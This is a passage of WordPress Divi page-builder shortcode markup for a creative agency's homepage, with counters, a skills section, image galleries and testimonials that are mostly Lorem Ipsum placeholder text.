background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-80px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum 